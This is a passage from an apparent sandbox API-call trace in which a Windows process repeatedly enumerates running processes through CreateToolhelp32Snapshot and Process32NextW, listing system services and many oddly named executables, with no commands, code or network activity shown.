lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0134.211] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0134.212] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0134.213] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, 
th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0134.215] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0134.224] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0134.226] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0134.227] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0134.228] CloseHandle (hObject=0xbc) returned 1 [0134.228] Sleep (dwMilliseconds=0x12c) [0134.575] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0134.579] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0134.580] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="System")) returned 1 [0134.581] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0134.581] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0134.582] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0134.583] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0134.583] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0134.584] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0134.585] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, 
szExeFile="lsass.exe")) returned 1 [0134.585] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0134.586] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0134.587] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0134.587] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0134.588] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0134.588] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x32, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0134.589] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="audiodg.exe")) returned 1 [0134.590] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0134.590] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0134.591] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0134.592] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0134.593] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0134.594] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0134.596] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="dwm.exe")) returned 1 [0134.597] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0134.598] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0134.599] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0134.600] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0134.601] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0134.602] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0134.603] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 
th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0134.604] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0134.606] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0134.607] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0134.608] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0134.609] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0134.610] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0134.611] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0134.612] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0134.613] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0134.614] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0134.615] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0134.616] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0134.617] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0134.618] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, 
th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0134.619] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0134.620] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0134.698] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0134.699] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0134.701] CloseHandle (hObject=0xc4) returned 1 [0134.701] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0134.706] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0134.706] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 
[0134.707] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0134.707] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0134.708] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0134.709] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0134.709] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0134.710] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0134.711] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0134.712] 
Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0134.712] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0134.713] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0134.714] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0134.714] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0134.715] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x32, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0134.716] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0134.716] 
Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0134.717] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0134.718] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0134.719] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0134.720] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0134.721] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0134.722] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0134.723] 
Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0134.724] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0134.725] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, 